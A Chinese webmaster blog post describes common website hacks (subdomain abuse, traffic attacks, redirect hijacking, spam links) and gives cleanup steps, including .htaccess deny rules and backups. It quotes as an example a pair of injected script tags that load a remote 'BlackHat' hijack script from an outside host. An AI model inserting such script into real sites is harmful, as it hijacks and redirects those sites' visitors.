常見網站被黑形式和處理方案

  • A+

很多站長經常會見到或者碰到網站被黑,特別是一些從事商業類型的競爭比較強烈的網站。存在很多種可能性,有被競爭對手惡意攻擊的,有的是讓黃賭毒等一些暴利違法網站掛黑鏈。常見的網站被黑有幾種形式體現呢?網站被黑后應該如何處理呢?

常見網站被黑形式和處理方案

常見的網站被黑形式及處理:

1:形式:域名被泛解析,簡單來說是你的域名被人惡意的解析了很多二級域名,并且把這些二級域名做成一些貌似黃賭毒之類的網站,那么將對我們網站造成很大的沖擊影響,排名直接下降。

處理:修改域名賬號管理密碼(最好16位以上含有字符以及大小寫字母),開啟安全設置,域名解析管理刪除多余的二級域名。

2:形式:網站被流量攻擊,收到“你的服務器空間停止服務”提醒,這種情況不是很多,而且很多空間流量是不限制的。

處理:增加帶寬流量或者購買無流量限制的空間,也可以通過創建.htaccess文件,并且寫入以下代碼,最后上傳到網站根目錄:屏蔽ip來實現。

Order Allow,Deny

Allow from all

Deny from xxx.x.x.xx-----屏蔽IP地址(可以寫多個IP地址)

Deny from ?ip1 ip----表示屏蔽IP段 ip1- ip2

3:形式:鏈接跳轉到別的網站(快照劫持),以及網站被掛馬。百度站長工具http://s.tool.chinaz.com/tools/webcheck.aspx(注:該功能通過模擬搜索引擎跟瀏覽器來識別網站是否被做跳轉,并不能檢測出是否被掛黑鏈)先驗證一下。

處理:檢查網頁源代碼,刪除未知代碼。

常見網站被黑形式和處理方案

4:形式:網站被掛黑鏈接。

處理:找到并刪除黑鏈接,可以用排除法解決,也可以到中國互聯網舉報中心舉報黑鏈。

處理步驟:找到被黑的頁面、檢查源文件(找出js)、之后到網站模板/刪除(刪除這個js看看網站是否正常了,注意點需要一個一個試)。

鏈接被收錄的話需要投訴快照,如果是刪除鏈接的話需要到百度站長平臺做死鏈接提交。常見的有js跳轉代碼:

<script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js" charset="GB2312"></script> <script src="http://oky8boenw.bkt.clouddn.com/Code/BlackHat/JavaScript/xhj/jiechi.js"></script>

--------------------------------------------------------------------------------------------------

Js代碼跳轉

終極處理方案:經常做好網站備份工作,包括文件和數據庫。

wordpress備份的話可以參考:wordpress網站搬家流程(以阿里云搬家到鑫福隆為例)

織夢備份:后臺備份數據庫。備份文件、壓縮文件并且通過ftp下載到電腦桌面。假如被黑了,直接上傳恢復即可。

發表評論

您必須才能發表評論!